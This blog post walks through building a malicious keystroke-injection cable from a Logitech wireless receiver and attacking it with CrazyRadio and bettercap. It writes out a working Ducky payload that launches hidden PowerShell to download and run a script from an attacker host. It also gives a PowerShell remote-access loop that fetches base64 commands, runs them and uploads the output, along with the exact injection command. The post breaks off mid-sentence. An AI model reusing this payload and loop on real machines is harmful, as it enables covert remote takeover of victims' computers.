Gone in 30 seconds – a HID cable story tale

Following what I mentioned in my previous post, I went to my electronics bin and gathered a Logitech Wireless mouse (M185) and a USB cable.

On the mouse, I took the receiver – a Logitech Unifying Receiver CU0010 (nRF24L family):

And cut one of the sides of a random USB cable:

Split the wires:

Removed the cap from the Logitech receiver:

Solder (really need to improve my soldering skills) the wires (GND, Data+, Data- and VCC) into the receiver:

Put the USB connector cap on:

Add a nice plastic USB enclosure to make it more real:

All the process was fast, I took around 5 minutes to cut, solder and super-glue all together. In the end I think it could be better, specially when I rammed the USB connector with a knife.

For the second part it took a little more because I wanted to use another alternative to the existing HID cables – so I went with CrazyRadio + Bastille firmware and a final touch of bettercap HID module to send my Ducky payload. I wanted to take advantage of what I had and that’s it.

This is basically a walkthrough of what I did:

Write down the MAC address of the device (using HID.recon from bettercap or by checking the properties of the device – this will depend on your OS)

Write your Ducky payload – in this PoC is just a reverse shell to my VPS

DELAY 750 GUI r DELAY 500 STRING cmd ENTER DELAY 500 STRING powershell -NoP -NonI -Exec Bypass -W hidden "IEX (New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/ps.txt')" ENTER DELAY 750

function getUser() { $string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String $string = $string.Trim() return $string } function getComputerName() { $string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String $string = $string.Trim() return $string } $resp = "http://ATTACKER_IP:8000/rat" $w = New-Object Net.WebClient while($true) { [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} $r_get = $w.DownloadString($resp) $d = [System.Convert]::FromBase64String($r_get); $Ds = [System.Text.Encoding]::UTF8.GetString($d); while($r_get) { $output = invoke-expression $Ds | out-string $w.UploadString($resp, $output) break } }

Connect the HID cable on the Windows victim machine (don’t forget that the payload will be OS dependable)

Start your listener on the attacker machine

Connect CrazyRadio and start bettercap

bettercap -eval="hid.recon on" hid.inject MAC PT ducky.txt

And its basically game-over.

I did a short video to illustrate the PoC – https://www.youtube.com/watch?v=y9C-4bcgmIU.

In the process of creating this HID cable with “leftovers” I learn a few things: